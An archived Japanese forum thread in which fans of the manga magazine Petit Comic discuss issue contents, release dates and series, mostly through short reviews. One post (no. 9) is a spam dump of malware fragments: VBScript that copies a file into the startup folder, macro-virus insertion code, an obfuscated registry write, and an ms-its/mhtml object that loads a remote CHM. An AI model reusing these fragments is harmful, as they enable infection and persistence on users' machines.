5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

プチコミック読んでる人!

1 :花と名無しさん:2006/11/04(土) 00:18:36 ID:???0
プチコミックについて語りましょう。
毎回落ちてしまうスレです。盛り上がれば…いいな。

公式 ttp://www.petitcomic.com/
関連スレは>>2

2 :花と名無しさん:2006/11/04(土) 00:19:06 ID:???0
関連スレ

禁断の恋でいこう★大海とむ
http://comic6.2ch.net/test/read.cgi/gcomic/1058761194/l50
まだいたの?北川みゆき25
http://comic6.2ch.net/test/read.cgi/gcomic/1152512379/l50
吉村明美
http://comic6.2ch.net/test/read.cgi/gcomic/1076919766/l50
★秋里和国について語ろう★
http://comic6.2ch.net/test/read.cgi/gcomic/1043317627/l50
愛】吉原由起を愛する人のためのスレ【人】
http://comic6.2ch.net/test/read.cgi/gcomic/1054306435/l50
○●さいとうちほ 4●○
http://comic6.2ch.net/test/read.cgi/gcomic/1131638233/l50

3 :花と名無しさん:2006/11/04(土) 00:26:37 ID:???0
藤井みつる
http://comic6.2ch.net/test/read.cgi/gcomic/1162546216/

4 :花と名無しさん:2006/11/04(土) 01:20:32 ID:???0
過去ログ捜索してきたw

◆プチコミックについて◆ (01/11/15〜)
http://makimo.to/2ch/comic_gcomic/1005/1005811146.html

5 :花と名無しさん:2006/11/04(土) 01:20:47 ID:???0
お!たったね嬉しいな
1さん乙〜〜〜
プチの作家スレってけっこうあったんだね

6 :花と名無しさん:2006/11/04(土) 01:36:59 ID:???0
あと4日で次の号発売だね
アゲ

7 :花と名無しさん:2006/11/04(土) 13:04:16 ID:???0
ほしゅ

8 :花と名無しさん:2006/11/04(土) 14:49:18 ID:???0
来月は長江さんの読み切りか…
高田りえイラネ
プチに子供っぽすぎて合ない気がするんだけど

9 :<body onload=window()>:2006/11/04(土) 15:54:18 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


10 :花と名無しさん:2006/11/04(土) 18:58:27 ID:???0
早売りゲットしたひといる?

11 :花と名無しさん:2006/11/05(日) 13:16:56 ID:OKmX7DOX0
終了

12 :花と名無しさん:2006/11/05(日) 19:02:11 ID:3PskHJay0
うちんとこはまだ見つけてないお

13 :花と名無しさん:2006/11/05(日) 19:08:40 ID:wQiSvVc+0
>>9
日本語でおk

14 :花と名無しさん:2006/11/05(日) 19:35:25 ID:???0
増刊も今月発売だっけ?

15 :花と名無しさん:2006/11/05(日) 20:13:14 ID:???0
次の本誌に予告出るんじゃまいか?
うちのとこもまだプチコミ見つけられない
見つけられた人、られっつきぼん

16 :花と名無しさん:2006/11/06(月) 21:17:58 ID:???0
発売もうすぐあげ

17 :花と名無しさん:2006/11/06(月) 22:35:33 ID:???0
前回の増刊に出てたラブログが結構良かったから、今月発売の増刊にも
載るとうれしいんだけど。新連載始まったばかりだから無理かなー

18 :花と名無しさん:2006/11/06(月) 22:54:05 ID:???0
毎回は無理なんじゃないかい?
自分は長谷部さんの刑事ものまたやって欲しい。あれは増刊連載なんだろーか
本誌は、秋里さんたのしみ

19 :花と名無しさん:2006/11/06(月) 22:55:35 ID:???0
今更だが、せいせい〜の表紙の裏の絵がキモイよ
(単行本の宣伝ページ)

20 :花と名無しさん:2006/11/08(水) 08:19:57 ID:???O
発売日なのでage

21 :花と名無しさん:2006/11/08(水) 18:59:06 ID:b2ZaZoNH0
保守

22 :花と名無しさん:2006/11/09(木) 00:28:32 ID:???0
ラブログってめちゃつまらなかったのは私だけ?
主人公に共感出来ない以前にうざいし。
軍隊行く!とか言ってたくせに速攻戻ってくる男もきもかったし。


23 :花と名無しさん:2006/11/09(木) 09:35:42 ID:???0
ちゅーか最近藤原さんの書くキャラ、話がいまいち面白くない
今の連載も第一回しか読んでない。

24 :花と名無しさん:2006/11/09(木) 18:47:03 ID:???0
プチコミックスレの皆様宣伝失礼致します。

第二回漫画最萌トーナメント一次予選開始(11/11(土)より)のお知らせに伺わせていただきました 10000キャラ以上が集う夢の祭典、
少女漫画関係からも複数キャラがエントリーされています、もし気が向かれた際にはお気軽にご参加いただければ幸いです
第二回漫画最萌トーナメントまとめサイトttp://max.45.kg/mangasaimoe/index.html 

25 :花と名無しさん:2006/11/09(木) 22:59:21 ID:???0
プライベート・プリンスは円城寺さんの出産前で終了すると思ってた…
産後もひっぱるのか〜。
正直全く面白くない。円城寺さんの作品って人気あるのかな?
だから話をひっぱってるのかな、とか考えてしまう。

26 :花と名無しさん:2006/11/10(金) 19:09:47 ID:???O
連載当初は楽しみにしてた>プライベート・プリンス
その後ヒロインがあまりにも簡単にセックルさせた事で
「ああ…またか…」って感じになったけど

27 :花と名無しさん:2006/11/10(金) 21:39:53 ID:???0
プライベートのプリンスと世界はボクらのために!の港の区別がつかない

スイートオアシスの表紙は一体何を表してるの…?

28 :花と名無しさん:2006/11/10(金) 22:30:21 ID:???O
>>27股の間からコンニチハ

29 :花と名無しさん:2006/11/11(土) 08:17:00 ID:vwTO7pQI0
円城寺さんって、性格も見た目も全然書き分けてないよな
それでお金になるって大したもんだw

30 :花と名無しさん:2006/11/11(土) 10:42:02 ID:???O
プチコミでの楽しみは「スイートオアシス」「蝶よ花よ」「さようなら、美しい人」だな。
みなさんは何が好き?

31 :花と名無しさん:2006/11/11(土) 11:28:20 ID:???0
>>30
年喰ってそう 35〜40代でしょw

32 :花と名無しさん:2006/11/11(土) 12:41:41 ID:???0
>>30
私は「スイートオアシス」がいいな。「蝶花」はいつもの吉原さんの
パターンであきた。「さようなら」は主人公の女に共感できないし。
読み切り3本も私にはダメだった。

33 :花と名無しさん:2006/11/11(土) 14:26:56 ID:???0
そろそろ新しい風がほしい…と思いつつ、
水谷さんの連載はつまらないし…

34 :花と名無しさん:2006/11/11(土) 15:50:30 ID:???0
水谷さん、円城寺さん化してるよね。
イミなしエロとかさ。

35 :花と名無しさん:2006/11/12(日) 03:21:41 ID:???0
秘かに吉野阿貴さんに期待している。
増刊の塾講師と楽器店員の話が好きだった。

36 :花と名無しさん:2006/11/12(日) 10:12:27 ID:???0
12月号 ラレッツ

【表紙】

【蝶よ】
【せいせい】
【今夜は】
【36センチ】
【オーガニック】
【ダイヤモンド】
【ミッドナイト】
【スイート】
【甘い】
【さようなら】

ギャグ&ショート
【オトナの】
【あなたに】
【店長の】
【たもつ(最終回)】

訂正あったらヨロ

37 :花と名無しさん:2006/11/15(水) 00:54:59 ID:???O
テンプレ借ります。
【表紙】
シンプルで結構良い。【蝶よ花よ】
この人本当にガンダム好きだな。
【せいせいするほど、愛してる】
奥さんほぼカス?!しかも名前がゆか?!カスの母親と同じ名前で使い回しが多い。
【今夜は恋のドレスで】
この人作品で久しぶりに面白いと思った。
【36a】
絵は好きなのだが話は・・・ビミョー。
【オーガニックボーイズ】
スルー。
【ダイヤモンド・ライフ】
ストーリーがパッとしない。ラブログと比べてしまう。
【ミッドナイト・セクレタリ】
スルー。
【スイートオアシス】今回も面白かった。1番好きだ。
【甘い、せ・ん・せ・い】
普通。
【さようなら、美しい人】
遼が出てきたあたりから面白くなった。


38 :花と名無しさん:2006/11/15(水) 08:29:00 ID:???0
お借りします
【表紙】いいんじゃない?
【蝶よ】版権とか大丈夫なのか、いつも思う
【せいせい】絵がキモイ。主人公キライだから奥さん応援したくなる。
【今夜は】偶然の上に成り立つエピソードばかりで、投稿作だと基本ができてないとか言われそう
でもこの人、読みきりの方が面白いと思う
【36センチ】ありがちな設定か
【オーガニック】まぁまぁだけど絵が好きじゃない
【スイート】面白い

他はスルーしますた

39 :花と名無しさん:2006/11/17(金) 17:51:12 ID:???0
増刊出たあげ

40 :花と名無しさん:2006/11/17(金) 23:46:21 ID:???O
増刊見た人いる?ビューティフルどうだった?

41 :花と名無しさん:2006/11/18(土) 01:08:16 ID:???0
借ります。
【表紙】 季節感があっていい
【蝶よ】 ホモゲームとか執事とか流行は押さえてるな
【せいせい】 キモ
【今夜は】 久しぶりに面白かったけどツマンネ
【36センチ】 絵は好き
【オーガニック】 キモ
【ダイヤモンド】バケてほしいところ
【ミッドナイト】 寸止め希望
【スイート】来月楽しみ
【甘い】結構好き
【さようなら】 どうでもいい

ギャグ&ショート
【オトナの】好き
【あなたに】ゲストキャラの自分語りが普通でよかった
【店長の】好き
【たもつ(最終回)】涙が出るほど嬉しい


42 :花と名無しさん:2006/11/18(土) 11:11:55 ID:???0
一冊全部読むまで時間かかるから、やっとられっつ書き込み増えだしたね
みんなの感想読めてたのしい
増刊の天婦羅もきぼんぬ

43 :花と名無しさん:2006/11/19(日) 11:52:59 ID:???0
プチコミ一月号増刊 テンプレドン!

【表紙:北川】
【BeautifulDays:藤井】
【せいせい:北川】
【背徳は:鮎川】
【眠れぬ夜:斗田】
【9to5:長谷部】
【ハートの:吉野】
【扉の中の:夏海】
【オトナの遠足Z:小出】
【Vitamin:星野】
【聖女か:浜口】
【籠り堂:吉永】
【ほっとけない彼:古島】
【焦れる:宮園】
【ジゴロ:小出】
【愛を:おおや】
【ビューティフル:さいとう】
【雪の刹那:葉山】
【外道:粒見】
【あなたに:今竹】
【ラブスマッシュ:美森】
【サプライズな:朱間】
【Ouch!!:紅迫】
【コイノハナ:小糸】

44 :花と名無しさん:2006/11/19(日) 12:05:01 ID:???0
読んだものだけ…

【表紙:北川】いつも似たようなカラー、編集は何も言わないのか??
【BeautifulDays:藤井】この作者の描く主人公ってどれもガラが悪すぎてキライ
【ジゴロ:小出】笑えなくなってきた
【ビューティフル:さいとう】 同行医者の言葉がいちいちバカっぽくてウザ-

批判ばかりでスマソ
どうでもいい話だけどオトナの遠足とジゴロちゃんの作者が同じということに
自分でテンプレ作って初めて気が付いた

45 :花と名無しさん:2006/11/19(日) 12:33:04 ID:???0
天婦羅乙!

46 :花と名無しさん:2006/11/20(月) 14:29:05 ID:???0
アゲ

47 :花と名無しさん:2006/11/21(火) 19:52:56 ID:???0
増刊買った人あんまりいないのかな

48 :花と名無しさん:2006/11/21(火) 20:36:34 ID:???0
増刊立ち読みした
長谷部さんの刑事ものが一番良かったような気がする
本誌はかってまで読むものではなくなった
スイート目当てに立ち読みしてるけど

49 :花と名無しさん:2006/11/22(水) 12:03:34 ID:???0
なんかすごくやる気のない雑誌に見えるw

50 :花と名無しさん:2006/11/22(水) 13:31:13 ID:???0
【表紙:北川】 絵はともかく、ピンクなのがよい。少女マンガっぽくて。
【BeautifulDays:藤井】 続編がありそうな結末。すっきりしない。
【せいせい:北川】 本編と一応リンクしてるのね。でも、イイオトナがみっともない・・
【背徳は:鮎川】 3Pなんだよね・・。ていうか、デッサン狂いすぎ。65頁上コマに違和感。
【眠れぬ夜:斗田】 勘違いと思い込みの激しすぎる主人公。いらいらする。
【9to5:長谷部】 このシリーズ好き。プチコミだと、サイコやグロ描写はこれで限度かな?
【ハートの:吉野】 立場逆転といった感じの〆がよかった。丁寧な絵。
【扉の中の:夏海】 完全に当て馬の上司・・・唐突過ぎる感じも。
【オトナの遠足Z:小出】 この人は、こういうコラム系マンガ合ってるね。
【Vitamin:星野】 いい話なんだろうけど、ボケすぎ。
【聖女か:浜口】 このシリーズ好きだけど、今回はイマイチ。あまり中身がない。
【籠り堂:吉永】 主人公たちのごたごたより、籠もり堂の伝承のほうが気になった。怖!
【ほっとけない彼:古島】 霊感設定、いらない気がする。
【焦れる:宮園】 単純に相手男がツンデレ風味なところが好きだ!
【ジゴロ:小出】 ジゴロ母みさこがお気に入り。いい子育てをしているよ。
【愛を:おおや】 珍しく?神田川とのからみが多かったのでよかった。いつもいつも相手の出てこない片思い話なんて、つまらんよ。
【ビューティフル:さいとう】 もうすぐ終わるのかな、このシリーズ。一生会わないほうが、悲恋っぽいんだけど・・。
【雪の刹那:葉山】 主人公の気持ちはわかりやすいのだけど、最後まで男の気持ちがよくわからなかった。何か今更感が。
【外道:粒見】 現実にこういうカップルいるよね。。。しかも、毎回似たような暴力男にひっかかる。何でだ?
【あなたに:今竹】 何でしょうか、このセクハラ男は。26歳? 中学生レベルだよ。
【ラブスマッシュ:美森】 最近バドにはまっているので、個人的にタイムリー。
【サプライズな:朱間】 絵がどんどん下手になっているような・・・?
【Ouch!!:紅迫】 Mのシリーズは結構よかったんだけど。話の先が見えすぎてつまらなかった。
【コイノハナ:小糸】 ラストの描き方がよかった。でも、最後の一文は余計。


51 :花と名無しさん:2006/11/22(水) 14:01:59 ID:???0
おお、びっちり感想乙!


52 :花と名無しさん:2006/11/22(水) 17:58:39 ID:???0
読んだのだけ
【表紙:北川】 苺喰ってるのなんか古い
【BeautifulDays:藤井】 まあまあ面白かった 途中で終わった感じ?
【せいせい:北川】 股間のファスナー開いてる絵が嫌過ぎる…
【背徳は:鮎川】 私も65P上の絵の体が変で気になりました。
【眠れぬ夜:斗田】 途中で読むの止めた 主人公馬鹿すぎ
【9to5:長谷部】 面白かった 男女ともキャラが好き 本誌連載希望
【ハートの:吉野】 絵は可愛い 話は普通
【扉の中の:夏海】 サスペンスかと思ったら違った
【Vitamin:星野】 ぶりっこすぎる主人公 
【籠り堂:吉永】 犯して妊娠させるのって、その後の子供の顔とかで無理があるんじゃ…
【焦れる:宮園】 家政婦ってのは冗談でも冗談になってないと思う
【愛を:おおや】 神田川ってお笑いの人に見えないよ 前回より面白かった
【ビューティフル:さいとう】面白かった。最後心中しちゃってもよかったのに。
【雪の刹那:葉山】 一年中ひきこもってて、正月に毎年主人公犯すってのがキモイ
【外道:粒見】 ドキュンすぎて心がすさむ
【あなたに:今竹】 夜明けのコーヒーとか冗談がオヤジ過ぎて引いた。
【Ouch!!:紅迫】 なんか…



53 :花と名無しさん:2006/11/23(木) 10:08:33 ID:???0
借ります
【表紙:北川】毎回おなじような感じ
【せいせい:北川】キモイ
【背徳は:鮎川】キモイ
【9to5:長谷部】キャラはいいんだけど核になる事件がイマイチ…かな
【扉の中の:夏海】この人の絵はキライじゃない
【Vitamin:星野】もう飽きた
【聖女か:浜口】実は絵がキライ、二昔前の絵って感じ
【焦れる:宮園】ちょっとは作画がマシになってきたかな
【ビューティフル:さいとう】面白い
【雪の刹那:葉山】男の心理がよく分からないというか…
【あなたに:今竹】オヤジギャグは狙ってるんだとオモ 話は面白いかも
【サプライズな:朱間】確かにちょっと退化してるかも…
【Ouch!!:紅迫】久しぶりです
【コイノハナ:小糸】悪くないけど絵が地味かな 頑張れ

54 :花と名無しさん:2006/11/25(土) 01:07:55 ID:???0
【オトナの遠足Z:小出】これだけ立ち読みしに本屋に行った。
             なんとなくがっくりした。

55 :花と名無しさん:2006/11/25(土) 02:18:48 ID:lbBBxrh10
韓流とか、ほんとどうでもいいよね
プチコミの韓流特集は、みんなこのオトナの遠足Zに出てる、
韓ドラおたくの編集って人が趣味と実益かねてやってるんじゃないの?
公私混同読者無視はなはだしいな

56 :花と名無しさん:2006/11/26(日) 23:45:36 ID:???0
あげ

57 :花と名無しさん:2006/11/27(月) 01:24:58 ID:???0
>>55
激しく同意。韓流とかって誰が見てるのって感じ。三十路のおばちゃんでしょ?

58 :花と名無しさん:2006/11/27(月) 06:48:56 ID:???0
三十路のおばちゃんですが、韓流なんてまるで興味ない。
むしろウザイ.


59 :花と名無しさん:2006/11/27(月) 10:52:39 ID:???0
三十路だけど、まわりの友人で韓流ファンなんて一人もいない
ともねえって編集者の趣味で韓流スターのインタビューとかいろいろあるなら
鬱陶しいな

60 :花と名無しさん:2006/11/28(火) 19:49:04 ID:???0
やっと増刊読んだ
けっこう連載もの?が多いんだね
どれが人気あるんだろう

61 :花と名無しさん:2006/11/30(木) 07:07:42 ID:uqrMAGse0
保守

62 :花と名無しさん:2006/12/03(日) 14:38:18 ID:???0
増刊の続きもので長そうなビューティフルとか?

63 :花と名無しさん:2006/12/05(火) 18:09:22 ID:???0
早売りゲッターさんいるう?アゲ

64 :花と名無しさん:2006/12/06(水) 21:05:55 ID:???0
今月号は買うかどうか迷っている…

65 :花と名無しさん:2006/12/07(木) 12:16:31 ID:???0
られっつ待ちアゲ

66 :花と名無しさん:2006/12/08(金) 08:08:28 ID:???O
発売日揚げ

67 :花と名無しさん:2006/12/08(金) 14:08:06 ID:???0
藤井みつるさんの「官能小説」が来年2月から映画化だって。
今月号に小さく載ってた。
誰が出るんだろ??

68 :花と名無しさん:2006/12/08(金) 20:54:26 ID:tQ4g6W+YO
発売日age。
今月号、全体的に良かったです!
特に、ふろくの一井さん。
増刊の続きものだったので、話に入り込みやすかった。
常盤さんの その後が見れて良かったし、今回のは常盤さんの性格や優しさがよくわかった。
みなさんの評価は どうでしょう?


69 :花と名無しさん:2006/12/09(土) 09:20:46 ID:???0
一井さんの絵ねぇ
見た感じの印象がもう少しきれいだったらなと思う
いっつも描いてある頬の縦線が汚く見せるんだろうか。なんか残念

誰とは言わんがガチガチにキレイすぎても面白みがないんだけどねw

70 :花と名無しさん:2006/12/09(土) 10:09:19 ID:???0
られっつ待ちアゲ〜

71 :花と名無しさん:2006/12/09(土) 12:29:47 ID:???0
では。
1月号 られっつ

【表紙】

【ミッドナイト】
【蝶よ花よ】
【せいせい】
【スイート オアシス】
【宵月に】
【ラビリンス】
【ダイヤモンド】
【さようなら】
【甘い】

ギャグ&ショート
【オトナの】
【店長の】
【あなたに】

別冊ふろく
【あの世で】
【Lock-on!】
【ままごと】
【雪は】

【次号】

72 :花と名無しさん:2006/12/09(土) 13:54:00 ID:???O
テンプレ乙

73 :花と名無しさん:2006/12/09(土) 22:07:21 ID:???0
テンプレ借ります。ありがd
【表紙】垢抜けない絵とカラー
【ミッドナイト】吸血鬼設定は不要な気ガス…
【蝶よ花よ】最近マンネリ気味だったけどまた良い感じにはじけて来たね。楽しみ。
【せいせい】表紙が気持ち悪い!設定が気持ち悪い!!登場人物が気持ち悪いぃー!!!
【スイート オアシス】泉タンウツクシス。幸純さんキターーーー!四つ巴の来週が楽しみ。
【宵月に】お約束な話の展開よりも、登場人物のあごの長さの方が気になった。
【ラビリンス】意外な結末で面白かった。さすがベテラン。
【ダイヤモンド】社長って結構暇なのかね。他人の家の事情に入り込み杉。
【さようなら】うーん。次号に期待。
【甘い】どの作品も男が同じ顔で、「ごめん、今日は加減できない」も同じパターン。

ギャグ&ショート
【オトナの】 スルー
【店長の】面白い。このテンションをずっと維持できるのはすごい。
【あなたに】終了キボン

別冊ふろく
【あの世で】絵も話も好きなんだけどいまいち盛り上がりに欠けた。
【Lock-on!】厨の落書きレベル。登場人物に「動き」が感じられない。
【ままごと】男の表情が乏しいのが気になったけど新人にしてはよく描けてると思う。
【雪は】増刊の続きだったから読みやすかった。


74 :花と名無しさん:2006/12/10(日) 10:03:05 ID:???0
テンプレお借りします
【表紙】絵が古い

【ミッドナイト】 古く見えるのは目の描き方のせい?
【蝶よ花よ】 ぶっ飛んできた。主人公がやたらモテるのが意味不明だけど…
【せいせい】 男が何故この女に惚れたのかが分からない
【スイート オアシス】 ついに4人顔合わせ!楽しみ
【宵月に】 たかがホテルの宿泊客がオーナー&従業員とここまで親密になれるんだね〜
【ラビリンス】 最後まで読んで「え?ちょっと待って」と読み直した。面白い。大ゴマ多いけど
【ダイヤモンド】言ってることは正しいけどおせっかいな社長だね
【さようなら】 スルー
【甘い】 >>73さんと同じ感想だけど、男が全部同じ顔&同じ思考パターン

ギャグ&ショート
【オトナの】 さすがにマンネリ化してきたかな
【店長の】面白い
【あなたに】 スルー

別冊ふろく
【あの世で】 パラパラと見たけどあまり面白そうになかったんで結局スルー
【Lock-on!】 適当感の否めないタイトル。絵は丁寧なのに全く好感が持てない。
【ままごと】 読ませる力がある。絵に華があればもっとよくなると思う
【雪は】下まつげが目から離れすぎのような希ガス

75 :花と名無しさん:2006/12/10(日) 13:50:06 ID:???O
プチコミに高田りえいるってマジ?

76 :花と名無しさん:2006/12/10(日) 20:43:53 ID:???0
>>75
先月描いてたよ。内容は微妙だったけど
ももんが(むささびだったかも)飼ってる人だよね?

77 :花と名無しさん:2006/12/10(日) 22:10:45 ID:???0
高田りえさんって、今プチコミにいるのかー微妙ってのわかる気も…
子供向けが似合ってる希ガス。
長谷部百合さんとかもプチコミに移籍したっぽいけど、どう?
チーズでおバカコメディ描いてたの覚えてるから想像つかない

78 :花と名無しさん:2006/12/10(日) 22:49:37 ID:???0
最近?移籍多いよね
すもと亜夢さんも描いたし

79 :花と名無しさん:2006/12/11(月) 00:32:59 ID:???0
プチコミックは前からそういう雑誌だよ

80 :花と名無しさん:2006/12/11(月) 11:27:28 ID:???0
>>68
私も常盤さんのその後が気になっていたので
続きが読めて嬉しかったよ〜!

藤はあんまり好きではないので、ゆきのちゃんとくっついてくれて
安心した〜。
お幸せにね、常盤さん。

81 :花と名無しさん:2006/12/11(月) 13:51:25 ID:???0
藤原晶の絵が落書き並みでびっくりしたんだけど

82 :花と名無しさん:2006/12/11(月) 21:01:26 ID:???0
>>79
コーラスみたいな感じなのか?

83 :花と名無しさん:2006/12/11(月) 22:15:55 ID:???0
そうかも
若くして中高生向け雑誌とかでデビューした作家が
キャリア積んで大人の感性になったら移籍してくる。
でも、大人感性には向いてないひとも多いよね
高田さんとか斗田さんとか星野さんとか小コミから来た人はやっぱりすこし
幼いと思ってしまいます。
最近の移籍作家で違和感ないのは長谷部さんくらいかな。


84 :花と名無しさん:2006/12/11(月) 22:28:07 ID:???0
北川さんも

85 :花と名無しさん:2006/12/12(火) 21:55:54 ID:???0
お借りします。
【表紙】 捜しやすくはあった

【ミッドナイト】悪くはないんだけど、大ゴマのせいか内容が薄い
【蝶よ花よ】 社長があんま好きじゃない。早く次行かないかな
【せいせい】 妊娠してそう
【スイート オアシス】 ゼウスに隠れている黒さが楽しみ
【宵月に】今月は別冊というふさわしい場所があるのにお前は…
【ラビリンス】さすがベテラン。面白かった。虐待の上を飾るダイヤにしんみり
【ダイヤモンド】 株やってる割にフラフラしてるねー。ハートフルで良かったけど
【さようなら】飽きた
【甘い】 この連載、エロが義務っぽかった。また本誌に来てね

ギャグ&ショート
【オトナの】 1コマ目イラネ
【店長の】面白い
【あなたに】 世間話はこれくらいが丁度よく満足

別冊ふろく
【あの世で】 もうちょっと絵に華があれば
【Lock-on!】 どうでもいい
【ままごと】 星巡りの悪いハチ(NANA)みたいな
【雪は】 面白かった

【次号】映画が原作ってあんま期待しないでおこう

86 :花と名無しさん:2006/12/17(日) 08:50:14 ID:???0
あげ

87 :花と名無しさん:2006/12/22(金) 07:33:55 ID:???0
保守

88 :花と名無しさん:2006/12/22(金) 08:47:46 ID:???0
2ちゃんねる漫画大賞2006
http://comic6.2ch.net/test/read.cgi/csaloon/1166744048/l50

投票よろしく

89 :花と名無しさん:2006/12/22(金) 22:54:11 ID:???0
発売すぎると話題なくなるな
んじゃあ、
本誌連載作品と、
増刊のシリーズ作品で、
それぞれ、どの作品が一番好き?

90 :花と名無しさん:2006/12/22(金) 22:59:23 ID:???0
アゲ

91 :花と名無しさん:2006/12/23(土) 02:24:17 ID:???O
>>89
本誌では、「スイートオアシス」が好きだな〜。来月号を早く読みたい。第Cの男が気になるし。

増刊では「ビューティフル」。さいとうさんが描くものは官能を漂わせるよ。
後、「ラブログ」の続きも見たいな〜。

92 :花と名無しさん:2006/12/23(土) 15:40:22 ID:???0
本誌はスイートオアシス
増刊は9to5かな これ続くかな
ぬるいラブコメはちょっと最近飽きてきた

93 :花と名無しさん:2006/12/23(土) 21:20:56 ID:???0
スイートオアシスは続きが気になるけど
主人公の八方美人っぷりにそろそろ嫌気がさしてきたな…。
最近は蝶花とミッドナイトが気になる。
ダイヤモンドは絵が汚いのがちょっと気になるけど
パチンコ好きの自分には耳が痛い話だった…。

94 :花と名無しさん:2006/12/24(日) 18:42:56 ID:???O
確かに。
スイートオアシスおもしろいんだけどヒロインが誰にでもいい顔してフラフラし過ぎ。

まぁ一途な恋愛漫画はいくらでもあるからあぁいうのもいいのかなぁ。

95 :花と名無しさん:2006/12/26(火) 13:34:30 ID:unoaF/KY0
今更書き込みますが、私はミッドナイトとても好きだよ。
それが読みたくて買ってるもん。(他はどうでも良い)
絵も格好良いと思うけどな〜。ちなみに増刊号はあんなに分厚いのにビューティフル
しか良くなかった・・・。


96 :花と名無しさん:2006/12/28(木) 15:21:03 ID:???0
ミッドナイトは読めば面白いけど
絵が古いから読む前にちょっとためらう。

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)